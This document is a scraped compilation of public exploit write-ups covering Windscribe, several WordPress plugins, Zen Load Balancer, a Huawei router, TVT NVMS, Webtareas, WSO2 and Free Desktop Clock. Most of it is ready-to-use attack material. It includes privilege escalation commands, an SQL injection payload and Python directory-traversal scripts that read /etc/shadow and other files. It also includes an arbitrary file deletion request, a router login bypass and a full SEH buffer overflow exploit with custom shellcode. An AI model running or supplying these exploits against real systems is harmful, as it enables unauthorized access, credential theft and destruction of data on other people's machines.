ISHACK AI BOT

# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path # Date: 2020-04-10 # Exploit Author: MgThuraMoeMyint # Vendor Homepage: https://windscribe.com # Version: v1.83 Build 20 # Tested on: Windows 10, version 1909 In windscribe v1.83 , there is a service via windscribe that every authenticated user can modify. C:\Users\mgthura>sc qc WindscribeService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WindscribeService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WindscribeService DEPENDENCIES : SERVICE_START_NAME : LocalSystem That shows that running as Local System this means that the BINARY_PATH_NAME parameter can be modified to execute any command on the system. I'll change binary_path_name with a command that add a user to administrators group , so it will be C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup administrators pentest /add" [SC] ChangeServiceConfig SUCCESS C:\Users\mgthura>sc stop WindscribeService SERVICE_NAME: WindscribeService TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x4 WAIT_HINT : 0x0 C:\Users\mgthura>sc start WindscribeService [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. Restarting service will cause the service to fail as the binary path would not point into the actual executable of the service. However the command will be executed successfully and the user will be added to the local administrators group.

Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin Version : 2.4.11 Software Link : https://wordpress.org/plugins/helpful/ Date of found: 10.04.2019 Author: Numan Türle core/Core.class.php // Ajax requests: pro add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) ); // set args for insert command $args = array( 'post_id' => $_REQUEST['post_id'], 'user' => $_REQUEST['user'], 'pro' => $_REQUEST['pro'], 'contra' => $_REQUEST['contra'] ); $result = $this->insert( $args ); @params = 'post_id' => $_REQUEST['post_id'], call function insert --> if( !$args['post_id'] ) return false; $check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id"); Payload : GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1

# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal # Date: 2020-04-10 # Exploit Author: Basim Alabdullah # Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download # Version: 3.10.1 # Tested on: Debian8u2 # # Technical Details: # The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. # The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. # Note that disclosure of the shadow file may allow an attacker to discover users' passwords # # Impact: # -------- # Successful exploitation could allow an attacker to obtain sensitive # information. import requests import sys if len(sys.argv) <2: print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow") sys.exit(-1) else: files=sys.argv[2] url=sys.argv[1] with requests.session() as s: urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs" response = s.get(urlz, auth=('admin', 'admin'), verify=False) txt=response.text print(response.text)

# Title: Huawei HG630 2 Router - Authentication Bypass # Date: 2020-04-13 # Author: Eslam Medhat # Vendor Homepage: www.huawei.com # Version: HG630 V2 # HardwareVersion: VER.B # CVE: N/A #POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: ************************Request************************ GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm ************************Response************************ HTTP/1.1 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Date: Fri, 01 Jan 2010 09:14:47 GMT Connection: Keep-Alive Content-Language: en Content-Type: application/javascript Content-Length: 141 while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ You can use that serial number to login to the router. #Reference: https://www.youtube.com/watch?v=vOrIL7L_cVc

# Exploit Title: TVT NVMS 1000 - Directory Traversal # Date: 2020-04-13 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html # Original Author : Numan Türle # CVE : CVE-2019-20085 import sys import requests import os import time if len(sys.argv) !=4: print " " print "Usage : python exploit.py url filename outputname" print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" print " " else: traversal = "../../../../../../../../../../../../../" filename = sys.argv[2] url = sys.argv[1]+traversal+filename outputname = sys.argv[3] content = requests.get(url) if content.status_code == 200: print " " print "Directory Traversal Succeeded" time.sleep(3) print " " print "Saving Output" os.system("touch " + outputname) output_write = open(outputname,"r+") output_write.write(content.text) output_write.close() else: print "Host not vulnerable to Directory Traversal!"

# Exploit Title: Webtateas 2.0 - Arbitrary File Read # Date: 2020-04-12 # Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. # Vendor Homepage: http://webtareas.sourceforge.net/general/home.php # Software Link: http://webtareas.sourceforge.net/general/home.php # Version: Webtateas v2.0 # Tested on: Windows # CVE : N/A Vulnerable Request: POST /webtareas/includes/general_serv.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 72 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/general/home.php? Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver DNT: 1 action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini

# Title: WSO2 3.1.0 - Arbitrary File Delete # Date: 2020-04-12 # Author: raki ben hamouda # Vendor: https://apim.docs.wso2.com # Softwrare link: https://apim.docs.wso2.com/en/latest/ # CVE: N/A Document Title: =============== WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) ##CVE not assigned yet ##Security Update : https://apim.docs.wso2.com/en/latest/ Common Vulnerability Scoring System: ==================================== 8.5 Affected Product(s): ==================== WSO2 API Manager Carbon Interface Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests and to delete arbitrary System files. The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. =============================== Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) [2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d eployment\server\registryextensions\commons-dir at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j ava:531) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.client.OperationClient.execute(OperationClient.java: 149) ~[axis2_1.6.1.wso2v38.jar:?] at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte nsions.stub_4.7.13.jar:?] at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens ions.ui_4.7.13.jar:?] at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t omcat_9.0.22.wso2v1.jar:?] *Error displayed in Web browser with body request: <script type="text/javascript"> CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar"); </script> ============================= Request Method(s): [+] POST Vulnerable Module(s): [+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp Vulnerable Parameter(s): [+] extensionName Server version 3.0.0 Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) 2-attacker uploads any file .jar extension 3-attacker intercepts the request that follows and modifies the parameter with traversal string: --- PoC Session Logs [POST] --- POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 Host: localhost:9443 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS Content-Length: 22 Origin: https://localhost:9443 Connection: close Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions Pragma: no-cache Cache-Control: no-cache extensionName=../../../../INSTALL.txt ---------------Returned Headers in Response------------------ HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Content-Type: text/html;charset=UTF-8 Content-Length: 10 Date: Sat, 04 Jan 2020 00:55:38 GMT Connection: close Server: WSO2 Carbon Server

# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) # Exploit Author: Bobby Cooke # Date: 2020-04-11 # Vendor: Drive Software Company # Vendor Site: http://www.drive-software.com # Software Download: http://www.drive-software.com/download/freeclock.exe # Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86) # - Does not work on x64 version # Version: Free Desktop Clock 3.0 # Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer ############################### CRASH INFO ############################### # [!] Access violation # 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044 # SEH chain of main thread # Address SE handler # 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite # 00410041 74737953 # 69620C00 *** CORRUPT ENTRY *** ############################### CRASH INFO ############################### File = 'poc.txt' ######################### EXPLOIT ENVIRONMENT INFO ######################### #badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e' #badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f' #goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f) # Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename # 0x00400000 | False | False | False | False | [FreeDesktopClock.exe] # 0x042b0000 | True | False | False | False | [Clock.dll] ######################### EXPLOIT ENVIRONMENT INFO ######################### os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite nSEH = '\xeb\x05' # jmp short +2 SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] # nSEH & SEH translated opcodes after Pop-Pop-Ret # EB 00 jmp short +2 # 05 00EB0043 add eax, 4300EB00 # GetPC to decode our decoder using Venetian Blinds technique getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory getPC += '\x61' # popad # [ESP] = &Payload getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes ebx2eax = '\x58' # pop eax # EAX = &Payload ebx2eax += '\x72' # add [edx], dh # Use Venetian Blinds technique to fix our mangled decoder # + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. # # Ajust EAX to &Decoder getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes getDecoder += '\x72' # add [edx], dh getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder getDecoder += '\x72' # add [edx], dh getDecoder += '\x50' # push eax # [ESP] = &Decoder getDecoder += '\x72' # add [edx], dh ############################# ZIPPER DECODER ############################### # Set EAX = First non-null byte of shellcode # init: # 1 | 50 | push eax # EAX = &Shellcode # 2 | 5F | pop edi # EDI = Decoder Destination Base Address # 3 | 47 | inc edi # First 0x00 byte of shellcode # 4:5 | 33D2 | xor edx, edx # 6:7 | 33C9 | xor ecx, ecx # 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter # decodeLoop: # 12:13 | 33DB | xor ebx, ebx # 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte # 15 | 42 | inc edx # increment to next non-null byte # 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte # 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte # 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00 # 23:24 | 301F | xor [edi], bl # Write next byte of shellcode # 25 | 47 | inc edi # 26 | 49 | dec ecx # 27:28 | 74 02 | je short jmp2code # 29:30 | ^ EB ED | jmp short decodeLoop # jmp2code: # 31 | 50 | push eax # 32 | C3 | ret ################################################3########################### #DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' #venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' # 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 # Note: These nop unicode instructions are actually [reg+0x00] not [reg] # The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes # Use the 3 byte version for Venetian Blinds alignment # Example: # nasm > add [edx], dh # 00000000 0032 add [edx],dh # nasm > add [edx+00], dh # 00000000 0032 add [edx],dh # nasm > add [edx+01], dh # 00000000 007201 add [edx+0x1],dh # + This happens when typing in ASM commands into msf-nasm_shell and immunity ## 2nd byte - \x00 => \x5F venBlinds = '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\xC6\x5F' # mov byte [eax], 0x50 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 4th byte - \x00 => \x33 venBlinds += '\xC6\x33' # mov byte [eax], 0x33 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 6th byte - \x00 => \x33 venBlinds += '\xC6\x33' # mov byte [eax], 0x33 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 8th byte - \x00 => \x66 venBlinds += '\xC6\x66' # mov byte [eax], 0x66 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 10th byte - \x00 => \x10 venBlinds += '\xC6\x10' # mov byte [eax], 0x10 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 12th byte - \x00 => \x33 venBlinds += '\xC6\x33' # mov byte [eax], 0x33 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 14th byte - \x00 => \x42 venBlinds += '\xC6\x42' # mov byte [eax], 0x42 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 16th byte - \x00 => \x32 venBlinds += '\xC6\x32' # mov byte [eax], 0x32 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 18th byte - \x00 => \x02 venBlinds += '\xC6\x02' # mov byte [eax], 0x02 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 20th byte - \x00 => \x10 venBlinds += '\xC6\x10' # mov byte [eax], 0x10 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 22nd byte - \x00 => \x3F venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 24nd byte - \x00 => \x1F venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 26th byte - \x00 => \x49 venBlinds += '\xC6\x49' # mov byte [eax], 0x49 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 28th byte - \x00 => \x02 venBlinds += '\xC6\x02' # mov byte [eax], 0x02 venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 30th byte - \x00 => \xED venBlinds += '\xC6\xED' # mov byte [eax], 0xED venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution venBlinds += '\x40' # inc eax // now eax points to the next '\x00' venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution ## 32nd byte - \x00 => \xC3 venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3 venBlinds += '\x72' # add [edx], dh venBlinds += '\x40' # inc eax // now eax points shellcode byte venBlinds += '\x72' # add [edx], dh # Jump to the decoded decoder by Returning to the address we saved on the stack venBlinds += '\xC3' # ret [!] Now we are executing the decoder! os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) #badChars = 00 0d 80 82->8e 91->9f # Custom PopCalc shellcode that avoids the bad characters fKernel32 = '\x33\xF6' # xor esi, esi fKernel32 += '\xF7\xE6' # mul esi fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll fKernel32 += '\x50' # push eax fKernel32 += '\x5E' # pop esi fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32 gExpotTbl = '\x33\xC9' # xor ecx, ecx gExpotTbl += '\x33\xF6' # xor esi, esi gExpotTbl += '\x33\xDB' # xor ebx, ebx gExpotTbl += '\xF7\xE3' # mul ebx gExpotTbl += '\x58' # pop eax # EAX = &kernel32 gExpotTbl += '\x50' # push eax # [ESP] = &kernel32 gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0 gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable gExpotTbl += '\x51' # push ecx gExpotTbl += '\x33\xFF' # xor edi, edi gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable gExpotTbl += '\x57' # push edi fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW fWinExec += '\x33\xC0' # xor eax, eax ; EAX = Counter fWinExec += '\x33\xF6' # xor esi, esi fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE" fWinExec += '\xFC' # cld ; Process strings left to right fWinExec += '\x50' # push eax fWinExec += '\x33\xC9' # xor ecx, ecx fWinExec += '\x41' # inc ecx fWinExec += '\x41' # inc ecx fWinExec += '\x41' # inc ecx fWinExec += '\x41' # inc ecx fWinExec += '\xF7\xE1' # mul ecx fWinExec += '\x33\xFF' # xor edi, edi fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx] fWinExec += '\x58' # pop eax fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec" fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop fWinExec += '\x40' # inc eax ; Counter ++ fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop fWinExec += '\x33\xC9' # xor ecx, ecx fWinExec += '\x41' # inc ecx fWinExec += '\x41' # inc ecx fWinExec += '\xF7\xE1' # mul ecx fWinExec += '\x33\xC9' # xor ecx, ecx fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable fWinExec += '\x03\xC8' # add ecx, eax fWinExec += '\x33\xC0' # xor eax, eax fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber fWinExec += '\x33\xC9' # xor ecx, ecx fWinExec += '\x41\x41\x41\x41' # inc ecx X 4 fWinExec += '\xF7\xE1' # mul ecx fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4] fWinExec += '\x01\x04\x24' # add [esp], eax fWinExec += '\x5A' # pop edx fWinExec += '\x33\xDB' # xor ebx, ebx fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec # Call WinExec( CmdLine, ShowState ); # CmdLine = "calc.exe" # ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163 callWinExec += '\x33\xC0' # xor eax, eax callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode filler = '\x77'*(9000-len(buffer)) buffer = buffer+filler try: payload = buffer f = open(File, 'w') f.write(payload) f.close() print File + " created successfully" except: print File + ' failed to create'

# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion # Google Dork: N/A # Date: 2020-04-13 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: http://davidlingren.com/ # Software Link: https://wordpress.org/plugins/media-library-assistant/ # Version: 2.81 # Tested on: Windows 7 x86 SP1 # CVE : CVE-2020-11731, CVE-2020-11732 ----Local File Inclusion---------------------------- There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. ----Multiple Cross-Site-Scripting------------------- There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. Note that this vulnerability requires authentication. Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2

